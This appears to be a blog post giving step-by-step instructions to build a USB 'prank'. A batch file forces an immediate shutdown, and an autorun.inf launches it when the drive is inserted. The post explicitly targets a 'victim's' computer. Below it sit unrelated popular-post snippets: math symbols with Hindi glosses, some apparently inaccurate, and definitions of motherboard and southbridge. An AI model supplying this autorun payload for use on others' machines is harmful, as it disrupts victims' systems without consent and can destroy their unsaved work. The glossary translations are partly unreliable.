Skip to main content

How To Shutdown Computer Using Pendrive.


Step 1:>>copy this  code into notepad:

@echo off
shutdown -s -t 00
Save as fun.bat extension (for eg: clickme.bat).

Step 2: 

Now open the notepad and copy this code:

[autorun]
Open=filename.bat
Action=Mouse Disable

Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3: 

Then copy the two files in your pen drive or victim's pen drive.

That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Comments

Popular posts from this blog

30 Mathematical symbols

Mathematical symbols: 1. Multiplication ( x ) - गुणा 2. Subtraction ( - ) - घटाना 3. Addition ( + ) - जोड़ना 4. Equals ( = ) - बराबर  5. Division ( ÷ ) - भाग 6. Is greater than (  > ) - से अधिक 7. Is less than ( < ) - से कम 8. Is not equal to ( ≠ ) - के बराबर नहीं  9. Is similar to ( ~ ) - के जैसा 10. Is congruent to ( ≅ ) -  के  समरूप  11. Infinity (∞) - अनन्तता 12. Implies ( ⇒ ) - संकेत दर्शाना  करना 13. Theta ( θ )  a plane angle 14. Empty set ( Ø ) - the unique set having no elements 15. Triangle ( Δ ) - त्रिकोण 16. Integral ( ∫ ) - अविभाज्य 17. The intersection of two sets ( ∩ )  18. Union of two sets ( ∪ )  19. Factorial ( ! ) - भाज्य-संबंधी 20. Percent ( % ) - प्रतिशत दर्शाना 21. Right angle ( ∟) - समकोण 22. Angle ( ∠ ) - कोण 23. Sum of ( ∑ ) - का जोड़ 24. Braces (grouping) ( { } ) 25. Brackets ( [ ] ) - ब्रैकेट लगाना 2...

What is Motherboard ?

Motherboard is a printed circuit board containing the principal components of a computer or other device, with connectors for other circuit boards to be slotted into.

What is Southbridge ?

The  southbridge  is one of the two chips in the core logic chipset on a personal computer (PC) motherboard, the other being the northbridge. The  southbridge typically implements the slower capabilities of the motherboard in a northbridge/ southbridge  chipset computer architecture.